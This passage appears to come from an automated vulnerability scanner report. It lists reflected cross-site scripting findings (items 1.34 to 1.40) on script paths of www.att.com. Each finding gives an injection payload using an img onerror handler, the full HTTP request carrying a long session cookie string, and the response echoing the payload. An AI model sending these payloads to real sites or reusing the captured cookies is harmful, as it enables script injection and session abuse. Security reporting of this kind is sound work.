1.34. https://www.att.com/olam/js/hideSelect.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.att.com
Path:	/olam/js/hideSelect.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b932c"><img%20src%3da%20onerror%3dalert(1)>966aff351f2 was submitted in the REST URL parameter 3. This input was echoed as b932c"><img src=a onerror=alert(1)>966aff351f2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/js/hideSelect.jsb932c"><img%20src%3da%20onerror%3dalert(1)>966aff351f2 HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/loginAction.olamexecute?customerType=U
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; DL3K=0; bn_u=6923325585437982304; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; __unam=7ba7478-12cdd7989ef-2fbe64b2-1; subDTAB=BUSINESS; entBusHomeBox1=0; entBusHomeBox2=2; DTAB=Tab=Res; op450wirelesssearchlandingpagegum=a02404n08u26cdl02f10cca75; op450phonedetailpagegum=a01703f07r26cfl05d1647fc3; op450phonedetailpageliid=a01703f07r26cfl05d1647fc3; __utmz=52846072.1292426425.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/29; __utma=52846072.14533459.1292205918.1292205918.1292426425.2; attPersistantLocalization=ltype=res|segment=res|company=bellsouth|state=Alabama|city=|dma=698|npanxx=334358; JSID_coredisp=0000faqis5o5G-K35ccnRPIv6SQ:14cs3p416; custClass=3; local_state=Alabama; ESUPPORTSESSIONID=JpRGNTvZrhRZgTp4hrGQBZYh!2105651400; ECOM_GTM=owbth_osaln_oesaln; ucvCookie=; BIGipServerpESUP_APP_7010=1021432199.25115.0000; TLTSID=54DA31220B8B100B6ECEAC6AA25AEBC1; TLTUID=54DA31220B8B100B6ECEAC6AA25AEBC1; svariants=CAL_PHD_2~B; fsr.s={"v":1,"rid":"1292775342411_742977","pv":1,"to":3,"c":"http://www.att.com/gen/general","lc":{"d0":{"v":1,"s":true}},"cd":0,"sd":0,"f":1292775384221}; BCNSESS=run=false; foresee.session=%7B%22alive%22%3A0%2C%22browser%22%3A%7B%22name%22%3A%22Chrome%22%2C%22version%22%3A8%2C%22platform%22%3A%22Windows%22%7D%2C%22timeout%22%3A3%2C%22start%22%3A1292775384447%2C%22fsrid%22%3A%22%22%2C%22pv%22%3A1%2C%22current%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22cdi%22%3A0%2C%22lc%22%3A%7B%22att-support-econtactus%22%3A1%7D%2C%22ls%22%3A%7B%22att-support-econtactus%22%3Atrue%7D%2C%22ec%22%3A%7B%22att-support-econtactus%22%3A0%7D%2C%22sd%22%3A%7B%22name%22%3A%22att-support-econtactus%22%2C%22idx%22%3A0%7D%2C%22previous%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22finish%22%3A1292775453764%7D; bn_search=true; TLTHID=85BE45760B8B100B694DDD9866917896; EDOCSSESSIONID=zcwlNTwNdsxkBcNl1ynC1WJ2wQF6QJBLvQ5yQ0hLh8Z4NNfX1s0J!-1335515953; stack=p2eam1m9; colam_ctn=l%3Den_US; browserid=A001265662746

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Content-Length: 9087
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 16:24:16 GMT
Connection: keep-alive
Set-Cookie: TLTHID=6C9DDACE0B8C100B7408DD9866917896; path=/; domain=.att.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/js/hideSelect.jsb932c"><img src=a onerror=alert(1)>966aff351f2">
...[SNIP]...

1.35. https://www.att.com/olam/js/posUtil.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.att.com
Path:	/olam/js/posUtil.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0e30"><img%20src%3da%20onerror%3dalert(1)>bc366608ae was submitted in the REST URL parameter 2. This input was echoed as c0e30"><img src=a onerror=alert(1)>bc366608ae in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/jsc0e30"><img%20src%3da%20onerror%3dalert(1)>bc366608ae/posUtil.js HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/loginAction.olamexecute?customerType=U
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; DL3K=0; bn_u=6923325585437982304; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; __unam=7ba7478-12cdd7989ef-2fbe64b2-1; subDTAB=BUSINESS; entBusHomeBox1=0; entBusHomeBox2=2; DTAB=Tab=Res; op450wirelesssearchlandingpagegum=a02404n08u26cdl02f10cca75; op450phonedetailpagegum=a01703f07r26cfl05d1647fc3; op450phonedetailpageliid=a01703f07r26cfl05d1647fc3; __utmz=52846072.1292426425.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/29; __utma=52846072.14533459.1292205918.1292205918.1292426425.2; attPersistantLocalization=ltype=res|segment=res|company=bellsouth|state=Alabama|city=|dma=698|npanxx=334358; JSID_coredisp=0000faqis5o5G-K35ccnRPIv6SQ:14cs3p416; custClass=3; local_state=Alabama; ESUPPORTSESSIONID=JpRGNTvZrhRZgTp4hrGQBZYh!2105651400; ECOM_GTM=owbth_osaln_oesaln; ucvCookie=; BIGipServerpESUP_APP_7010=1021432199.25115.0000; TLTSID=54DA31220B8B100B6ECEAC6AA25AEBC1; TLTUID=54DA31220B8B100B6ECEAC6AA25AEBC1; svariants=CAL_PHD_2~B; fsr.s={"v":1,"rid":"1292775342411_742977","pv":1,"to":3,"c":"http://www.att.com/gen/general","lc":{"d0":{"v":1,"s":true}},"cd":0,"sd":0,"f":1292775384221}; BCNSESS=run=false; foresee.session=%7B%22alive%22%3A0%2C%22browser%22%3A%7B%22name%22%3A%22Chrome%22%2C%22version%22%3A8%2C%22platform%22%3A%22Windows%22%7D%2C%22timeout%22%3A3%2C%22start%22%3A1292775384447%2C%22fsrid%22%3A%22%22%2C%22pv%22%3A1%2C%22current%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22cdi%22%3A0%2C%22lc%22%3A%7B%22att-support-econtactus%22%3A1%7D%2C%22ls%22%3A%7B%22att-support-econtactus%22%3Atrue%7D%2C%22ec%22%3A%7B%22att-support-econtactus%22%3A0%7D%2C%22sd%22%3A%7B%22name%22%3A%22att-support-econtactus%22%2C%22idx%22%3A0%7D%2C%22previous%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22finish%22%3A1292775453764%7D; bn_search=true; TLTHID=85BE45760B8B100B694DDD9866917896; EDOCSSESSIONID=zcwlNTwNdsxkBcNl1ynC1WJ2wQF6QJBLvQ5yQ0hLh8Z4NNfX1s0J!-1335515953; stack=p2eam1m9; colam_ctn=l%3Den_US; browserid=A001265662746

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Content-Length: 9083
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 16:25:22 GMT
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/jsc0e30"><img src=a onerror=alert(1)>bc366608ae/posUtil.js">
...[SNIP]...

1.36. https://www.att.com/olam/js/posUtil.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.att.com
Path:	/olam/js/posUtil.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84919"><img%20src%3da%20onerror%3dalert(1)>57aa3cf90a1 was submitted in the REST URL parameter 3. This input was echoed as 84919"><img src=a onerror=alert(1)>57aa3cf90a1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/js/posUtil.js84919"><img%20src%3da%20onerror%3dalert(1)>57aa3cf90a1 HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/loginAction.olamexecute?customerType=U
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; DL3K=0; bn_u=6923325585437982304; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; __unam=7ba7478-12cdd7989ef-2fbe64b2-1; subDTAB=BUSINESS; entBusHomeBox1=0; entBusHomeBox2=2; DTAB=Tab=Res; op450wirelesssearchlandingpagegum=a02404n08u26cdl02f10cca75; op450phonedetailpagegum=a01703f07r26cfl05d1647fc3; op450phonedetailpageliid=a01703f07r26cfl05d1647fc3; __utmz=52846072.1292426425.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/29; __utma=52846072.14533459.1292205918.1292205918.1292426425.2; attPersistantLocalization=ltype=res|segment=res|company=bellsouth|state=Alabama|city=|dma=698|npanxx=334358; JSID_coredisp=0000faqis5o5G-K35ccnRPIv6SQ:14cs3p416; custClass=3; local_state=Alabama; ESUPPORTSESSIONID=JpRGNTvZrhRZgTp4hrGQBZYh!2105651400; ECOM_GTM=owbth_osaln_oesaln; ucvCookie=; BIGipServerpESUP_APP_7010=1021432199.25115.0000; TLTSID=54DA31220B8B100B6ECEAC6AA25AEBC1; TLTUID=54DA31220B8B100B6ECEAC6AA25AEBC1; svariants=CAL_PHD_2~B; fsr.s={"v":1,"rid":"1292775342411_742977","pv":1,"to":3,"c":"http://www.att.com/gen/general","lc":{"d0":{"v":1,"s":true}},"cd":0,"sd":0,"f":1292775384221}; BCNSESS=run=false; foresee.session=%7B%22alive%22%3A0%2C%22browser%22%3A%7B%22name%22%3A%22Chrome%22%2C%22version%22%3A8%2C%22platform%22%3A%22Windows%22%7D%2C%22timeout%22%3A3%2C%22start%22%3A1292775384447%2C%22fsrid%22%3A%22%22%2C%22pv%22%3A1%2C%22current%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22cdi%22%3A0%2C%22lc%22%3A%7B%22att-support-econtactus%22%3A1%7D%2C%22ls%22%3A%7B%22att-support-econtactus%22%3Atrue%7D%2C%22ec%22%3A%7B%22att-support-econtactus%22%3A0%7D%2C%22sd%22%3A%7B%22name%22%3A%22att-support-econtactus%22%2C%22idx%22%3A0%7D%2C%22previous%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22finish%22%3A1292775453764%7D; bn_search=true; TLTHID=85BE45760B8B100B694DDD9866917896; EDOCSSESSIONID=zcwlNTwNdsxkBcNl1ynC1WJ2wQF6QJBLvQ5yQ0hLh8Z4NNfX1s0J!-1335515953; stack=p2eam1m9; colam_ctn=l%3Den_US; browserid=A001265662746

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Content-Length: 9084
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 16:25:30 GMT
Connection: keep-alive
Set-Cookie: TLTHID=985296500B8C100B769CDD9866917896; path=/; domain=.att.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/js/posUtil.js84919"><img src=a onerror=alert(1)>57aa3cf90a1">
...[SNIP]...

1.37. https://www.att.com/olam/js/prototype.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.att.com
Path:	/olam/js/prototype.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e59e"><img%20src%3da%20onerror%3dalert(1)>9ff2cb7b4f8 was submitted in the REST URL parameter 2. This input was echoed as 3e59e"><img src=a onerror=alert(1)>9ff2cb7b4f8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/js3e59e"><img%20src%3da%20onerror%3dalert(1)>9ff2cb7b4f8/prototype.js HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/loginAction.olamexecute?customerType=U
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; DL3K=0; bn_u=6923325585437982304; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; __unam=7ba7478-12cdd7989ef-2fbe64b2-1; subDTAB=BUSINESS; entBusHomeBox1=0; entBusHomeBox2=2; DTAB=Tab=Res; op450wirelesssearchlandingpagegum=a02404n08u26cdl02f10cca75; op450phonedetailpagegum=a01703f07r26cfl05d1647fc3; op450phonedetailpageliid=a01703f07r26cfl05d1647fc3; __utmz=52846072.1292426425.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/29; __utma=52846072.14533459.1292205918.1292205918.1292426425.2; attPersistantLocalization=ltype=res|segment=res|company=bellsouth|state=Alabama|city=|dma=698|npanxx=334358; JSID_coredisp=0000faqis5o5G-K35ccnRPIv6SQ:14cs3p416; custClass=3; local_state=Alabama; ESUPPORTSESSIONID=JpRGNTvZrhRZgTp4hrGQBZYh!2105651400; ECOM_GTM=owbth_osaln_oesaln; ucvCookie=; BIGipServerpESUP_APP_7010=1021432199.25115.0000; TLTSID=54DA31220B8B100B6ECEAC6AA25AEBC1; TLTUID=54DA31220B8B100B6ECEAC6AA25AEBC1; svariants=CAL_PHD_2~B; fsr.s={"v":1,"rid":"1292775342411_742977","pv":1,"to":3,"c":"http://www.att.com/gen/general","lc":{"d0":{"v":1,"s":true}},"cd":0,"sd":0,"f":1292775384221}; BCNSESS=run=false; foresee.session=%7B%22alive%22%3A0%2C%22browser%22%3A%7B%22name%22%3A%22Chrome%22%2C%22version%22%3A8%2C%22platform%22%3A%22Windows%22%7D%2C%22timeout%22%3A3%2C%22start%22%3A1292775384447%2C%22fsrid%22%3A%22%22%2C%22pv%22%3A1%2C%22current%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22cdi%22%3A0%2C%22lc%22%3A%7B%22att-support-econtactus%22%3A1%7D%2C%22ls%22%3A%7B%22att-support-econtactus%22%3Atrue%7D%2C%22ec%22%3A%7B%22att-support-econtactus%22%3A0%7D%2C%22sd%22%3A%7B%22name%22%3A%22att-support-econtactus%22%2C%22idx%22%3A0%7D%2C%22previous%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22finish%22%3A1292775453764%7D; bn_search=true; TLTHID=85BE45760B8B100B694DDD9866917896; EDOCSSESSIONID=zcwlNTwNdsxkBcNl1ynC1WJ2wQF6QJBLvQ5yQ0hLh8Z4NNfX1s0J!-1335515953; stack=p2eam1m9; colam_ctn=l%3Den_US; browserid=A001265662746

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Content-Length: 9086
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 16:23:48 GMT
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/js3e59e"><img src=a onerror=alert(1)>9ff2cb7b4f8/prototype.js">
...[SNIP]...

1.38. https://www.att.com/olam/js/prototype.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.att.com
Path:	/olam/js/prototype.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47877"><img%20src%3da%20onerror%3dalert(1)>6a3684d7ea0 was submitted in the REST URL parameter 3. This input was echoed as 47877"><img src=a onerror=alert(1)>6a3684d7ea0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/js/prototype.js47877"><img%20src%3da%20onerror%3dalert(1)>6a3684d7ea0 HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/loginAction.olamexecute?customerType=U
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; DL3K=0; bn_u=6923325585437982304; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; __unam=7ba7478-12cdd7989ef-2fbe64b2-1; subDTAB=BUSINESS; entBusHomeBox1=0; entBusHomeBox2=2; DTAB=Tab=Res; op450wirelesssearchlandingpagegum=a02404n08u26cdl02f10cca75; op450phonedetailpagegum=a01703f07r26cfl05d1647fc3; op450phonedetailpageliid=a01703f07r26cfl05d1647fc3; __utmz=52846072.1292426425.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/29; __utma=52846072.14533459.1292205918.1292205918.1292426425.2; attPersistantLocalization=ltype=res|segment=res|company=bellsouth|state=Alabama|city=|dma=698|npanxx=334358; JSID_coredisp=0000faqis5o5G-K35ccnRPIv6SQ:14cs3p416; custClass=3; local_state=Alabama; ESUPPORTSESSIONID=JpRGNTvZrhRZgTp4hrGQBZYh!2105651400; ECOM_GTM=owbth_osaln_oesaln; ucvCookie=; BIGipServerpESUP_APP_7010=1021432199.25115.0000; TLTSID=54DA31220B8B100B6ECEAC6AA25AEBC1; TLTUID=54DA31220B8B100B6ECEAC6AA25AEBC1; svariants=CAL_PHD_2~B; fsr.s={"v":1,"rid":"1292775342411_742977","pv":1,"to":3,"c":"http://www.att.com/gen/general","lc":{"d0":{"v":1,"s":true}},"cd":0,"sd":0,"f":1292775384221}; BCNSESS=run=false; foresee.session=%7B%22alive%22%3A0%2C%22browser%22%3A%7B%22name%22%3A%22Chrome%22%2C%22version%22%3A8%2C%22platform%22%3A%22Windows%22%7D%2C%22timeout%22%3A3%2C%22start%22%3A1292775384447%2C%22fsrid%22%3A%22%22%2C%22pv%22%3A1%2C%22current%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22cdi%22%3A0%2C%22lc%22%3A%7B%22att-support-econtactus%22%3A1%7D%2C%22ls%22%3A%7B%22att-support-econtactus%22%3Atrue%7D%2C%22ec%22%3A%7B%22att-support-econtactus%22%3A0%7D%2C%22sd%22%3A%7B%22name%22%3A%22att-support-econtactus%22%2C%22idx%22%3A0%7D%2C%22previous%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22finish%22%3A1292775453764%7D; bn_search=true; TLTHID=85BE45760B8B100B694DDD9866917896; EDOCSSESSIONID=zcwlNTwNdsxkBcNl1ynC1WJ2wQF6QJBLvQ5yQ0hLh8Z4NNfX1s0J!-1335515953; stack=p2eam1m9; colam_ctn=l%3Den_US; browserid=A001265662746

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Content-Length: 9086
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 16:23:56 GMT
Connection: keep-alive
Set-Cookie: TLTHID=603F98580B8C100B734ADD9866917896; path=/; domain=.att.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/js/prototype.js47877"><img src=a onerror=alert(1)>6a3684d7ea0">
...[SNIP]...

1.39. https://www.att.com/olam/js/sniffer.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.att.com
Path:	/olam/js/sniffer.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3064"><img%20src%3da%20onerror%3dalert(1)>73a309fb4e6 was submitted in the REST URL parameter 2. This input was echoed as d3064"><img src=a onerror=alert(1)>73a309fb4e6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/jsd3064"><img%20src%3da%20onerror%3dalert(1)>73a309fb4e6/sniffer.js HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/loginAction.olamexecute?customerType=U
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; DL3K=0; bn_u=6923325585437982304; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; __unam=7ba7478-12cdd7989ef-2fbe64b2-1; subDTAB=BUSINESS; entBusHomeBox1=0; entBusHomeBox2=2; DTAB=Tab=Res; op450wirelesssearchlandingpagegum=a02404n08u26cdl02f10cca75; op450phonedetailpagegum=a01703f07r26cfl05d1647fc3; op450phonedetailpageliid=a01703f07r26cfl05d1647fc3; __utmz=52846072.1292426425.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/29; __utma=52846072.14533459.1292205918.1292205918.1292426425.2; attPersistantLocalization=ltype=res|segment=res|company=bellsouth|state=Alabama|city=|dma=698|npanxx=334358; JSID_coredisp=0000faqis5o5G-K35ccnRPIv6SQ:14cs3p416; custClass=3; local_state=Alabama; ESUPPORTSESSIONID=JpRGNTvZrhRZgTp4hrGQBZYh!2105651400; ECOM_GTM=owbth_osaln_oesaln; ucvCookie=; BIGipServerpESUP_APP_7010=1021432199.25115.0000; TLTSID=54DA31220B8B100B6ECEAC6AA25AEBC1; TLTUID=54DA31220B8B100B6ECEAC6AA25AEBC1; svariants=CAL_PHD_2~B; fsr.s={"v":1,"rid":"1292775342411_742977","pv":1,"to":3,"c":"http://www.att.com/gen/general","lc":{"d0":{"v":1,"s":true}},"cd":0,"sd":0,"f":1292775384221}; BCNSESS=run=false; foresee.session=%7B%22alive%22%3A0%2C%22browser%22%3A%7B%22name%22%3A%22Chrome%22%2C%22version%22%3A8%2C%22platform%22%3A%22Windows%22%7D%2C%22timeout%22%3A3%2C%22start%22%3A1292775384447%2C%22fsrid%22%3A%22%22%2C%22pv%22%3A1%2C%22current%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22cdi%22%3A0%2C%22lc%22%3A%7B%22att-support-econtactus%22%3A1%7D%2C%22ls%22%3A%7B%22att-support-econtactus%22%3Atrue%7D%2C%22ec%22%3A%7B%22att-support-econtactus%22%3A0%7D%2C%22sd%22%3A%7B%22name%22%3A%22att-support-econtactus%22%2C%22idx%22%3A0%7D%2C%22previous%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22finish%22%3A1292775453764%7D; bn_search=true; TLTHID=85BE45760B8B100B694DDD9866917896; EDOCSSESSIONID=zcwlNTwNdsxkBcNl1ynC1WJ2wQF6QJBLvQ5yQ0hLh8Z4NNfX1s0J!-1335515953; stack=p2eam1m9; colam_ctn=l%3Den_US; browserid=A001265662746

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Content-Length: 9084
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 16:25:25 GMT
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/jsd3064"><img src=a onerror=alert(1)>73a309fb4e6/sniffer.js">
...[SNIP]...

1.40. https://www.att.com/olam/js/sniffer.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.att.com
Path:	/olam/js/sniffer.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ce05"><img%20src%3da%20onerror%3dalert(1)>0460bed6911 was submitted in the REST URL parameter 3. This input was echoed as 3ce05"><img src=a onerror=alert(1)>0460bed6911 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/js/sniffer.js3ce05"><img%20src%3da%20onerror%3dalert(1)>0460bed6911 HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/loginAction.olamexecute?customerType=U
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; DL3K=0; bn_u=6923325585437982304; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; __unam=7ba7478-12cdd7989ef-2fbe64b2-1; subDTAB=BUSINESS; entBusHomeBox1=0; entBusHomeBox2=2; DTAB=Tab=Res; op450wirelesssearchlandingpagegum=a02404n08u26cdl02f10cca75; op450phonedetailpagegum=a01703f07r26cfl05d1647fc3; op450phonedetailpageliid=a01703f07r26cfl05d1647fc3; __utmz=52846072.1292426425.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/29; __utma=52846072.14533459.1292205918.1292205918.1292426425.2; attPersistantLocalization=ltype=res|segment=res|company=bellsouth|state=Alabama|city=|dma=698|npanxx=334358; JSID_coredisp=0000faqis5o5G-K35ccnRPIv6SQ:14cs3p416; custClass=3; local_state=Alabama; ESUPPORTSESSIONID=JpRGNTvZrhRZgTp4hrGQBZYh!2105651400; ECOM_GTM=owbth_osaln_oesaln; ucvCookie=; BIGipServerpESUP_APP_7010=1021432199.25115.0000; TLTSID=54DA31220B8B100B6ECEAC6AA25AEBC1; TLTUID=54DA31220B8B100B6ECEAC6AA25AEBC1; svariants=CAL_PHD_2~B; fsr.s={"v":1,"rid":"1292775342411_742977","pv":1,"to":3,"c":"http://www.att.com/gen/general","lc":{"d0":{"v":1,"s":true}},"cd":0,"sd":0,"f":1292775384221}; BCNSESS=run=false; 